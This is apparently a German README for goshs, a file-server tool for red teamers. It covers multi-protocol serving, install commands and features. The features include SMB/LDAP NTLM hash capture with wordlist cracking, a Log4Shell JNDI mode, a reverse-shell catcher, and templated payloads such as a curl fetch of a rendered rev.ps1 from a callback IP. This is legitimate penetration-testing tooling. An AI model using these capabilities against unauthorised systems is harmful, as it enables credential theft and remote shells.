
Funktionsreicher Single-Binary-Dateiserver für Red Teamer und Entwickler. HTTP/S · WebDAV · FTP/SFTP · SMB · LDAP/S · NTLM-Hash-Erfassung · DNS/SMTP-Callbacks · TLS · Auth · Freigabelinks. Ein leistungsstarker Ersatz für python3 -m http.server.
Du bist mitten in einem Engagement. Du musst eine Datei übertragen, einen SMB-Hash abfangen oder schnell einen HTTPS-Server aufsetzen – und python3 -m http.server reicht dafür nicht aus.
goshs ist ein Dateiserver als einzelne Binärdatei, gebaut für die Momente, in denen du mehr brauchst als Pythons SimpleHTTPServer, aber kein Apache konfigurieren willst. HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S, Basic Auth, Share-Links, DNS/SMTP-Callbacks, NTLM-Hash-Erfassung + -Cracking – alles mit einem einzigen Befehl.


Probier es selbst aus: demo.goshs.de

# Aktuelles Verzeichnis auf Port 8000 bereitstellen
goshs
# Mit HTTPS (selbstsigniert) und Basic Auth bereitstellen
goshs -s -ss -b user:password
# SMB-Hashes erfassen
goshs -smb -smb-domain CORP
# LDAP-Zugangsdaten und NTLM-Hashes erfassen (mit optionalem Wörterbuch-Cracking)
goshs -ldap
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# DNS-Callbacks abfangen und E-Mails empfangen
goshs -dns -dns-ip 1.2.3.4 -smtp -smtp-domain your-domain.com
# Selbstzerstörung nach 2 Stunden
goshs --ttl 2h
# Mit interaktivem Terminal-Dashboard ausführen (ideal für headless SSH-Sitzungen)
goshs --tui
# Payloads bereitstellen, die beim Download automatisch deinen Callback-Host/Port ausfüllen
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# gerendert abrufen: curl 'http://10.10.14.7:8000/rev.ps1?tpl'
Für eine ausführliche Dokumentation besuche docs.goshs.de
goshs kann Tab-Vervollständigung für bash, fish und zsh installieren:
goshs --completion bash
goshs --completion fish
goshs --completion zsh
Auf macOS mit Homebrew wird automatisch der korrekte Homebrew-Pfad verwendet. Nach der Installation gibt der Befehl eine genaue Aktivierungsanweisung aus, z. B.:
source ~/.local/share/bash-completion/completions/goshs
Die gebündelten Web-Assets sind eingecheckt, daher funktioniert ein einfacher Build direkt:
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
Wenn du die JavaScript- oder SCSS-Quellen änderst, baue die Assets zuerst neu, wobei esbuild und sass installiert sein müssen:
make generate
go build -o goshs .
Das sind die großartigen Mitwirkenden, die goshs noch sicherer gemacht haben ❤️
Tritt der Discord-Community bei und vernetze dich.
Ein besonderer Dank geht an sc0tfree für die Inspiration zu diesem Projekt durch sein in Python geschriebenes Projekt updog.
| 📁 Dateioperationen | Download (fortsetzbar & suchbar über HTTP Range), Upload (Drag & Drop, POST/PUT), Löschen, Bulk-ZIP, QR-Codes |
| 🔌 Protokolle | HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S |
| 🔒 Authentifizierung & Sicherheit | Basic Auth, Zertifikats-Auth, TLS (selbstsigniert, Let's Encrypt, eigenes Zertifikat), IP-Whitelist, dateibasierte ACLs |
| ⚙️ Servermodi | Nur-Lesen, Nur-Upload, Kein-Löschen, Silent, Unsichtbar, CLI-Befehlsausführung, TTL-Selbstzerstörung |
| 🔗 Share-Links | Token-basiertes Teilen, Download-Limit, Zeitlimit |
| 🎯 Kollaboration / CTF | Live-Team-Chat (Markdown, Emoji + :shortcodes:-Autovervollständigung, Bild-Einfügen, Datei-Upload, Reaktionen, Nachrichten bearbeiten, optionale Disk-Persistenz – geteilt zwischen Web ↔ TUI), DNS-Server, SMTP-Server, SMB-NTLM-Hash-Erfassung + -Cracking, LDAP-Zugangsdaten-Erfassung + NTLM-Hash-Cracking (JNDI-Modus für Log4Shell), Redirect-Endpunkt, Rev-Shell-Catcher + Payload-Generator |
| 🧩 Payload-Templating | {{.LHOST}}/{{.LPORT}} + benutzerdefinierte --tpl-var-Werte bei Bedarf in bereitgestellte Dateien rendern (?tpl) |
| 🔔 Integration | Webhooks, Tunnel über localhost.run, Konfigurationsdatei, JSON-API, mDNS |
| 🖥️ TUI-Dashboard | Interaktives Vollbild-Terminal-Dashboard; Live-Panels für HTTP, DNS, SMB, LDAP, SMTP, Reverse Shells und Team-Chat; Shells aus dem Terminal anhängen und upgraden |
| 🛠️ Sonstiges | Dunkle/helle Themes, Team-Chat, Selbst-Update, Log-Ausgabe, Dateien einbetten, Privilegien aufgeben |
| Methode |
|---|
| 🐧 curl | sh | curl -sSfL https://goshs.de/install.sh | sh |
| 🦫 Go | go install goshs.de/goshs/v2@latest |
| 🐉 Kali & Parrot OS | sudo apt install goshs |
| 🎗️ Arch Linux (AUR) | yay -S goshs-bin |
| 🖤 BlackArch | pacman -S goshs |
| 🏔️ Alpine Linux (edge) | apk add goshs |
| 🫙 Snap | snap install goshs |
| 🎩 Fedora / RHEL (COPR) | dnf copr enable goshs-labs/goshs && dnf install goshs |
| 🦎 openSUSE | sudo zypper install goshs |
| ❄️ Nix / NixOS | nix-env -iA nixpkgs.goshs |
| 🍺 Homebrew | brew install goshs |
| 🪟 Scoop | scoop bucket add extras && scoop install extras/goshs |
| 🪟 winget | winget install GoshsLabs.Goshs |
| 🍫 Chocolatey | choco install goshs |
| 🐳 Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
| 📦 Release | Von GitHub Releases herunterladen |
![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | wooseokdotkim | Guilhem7 |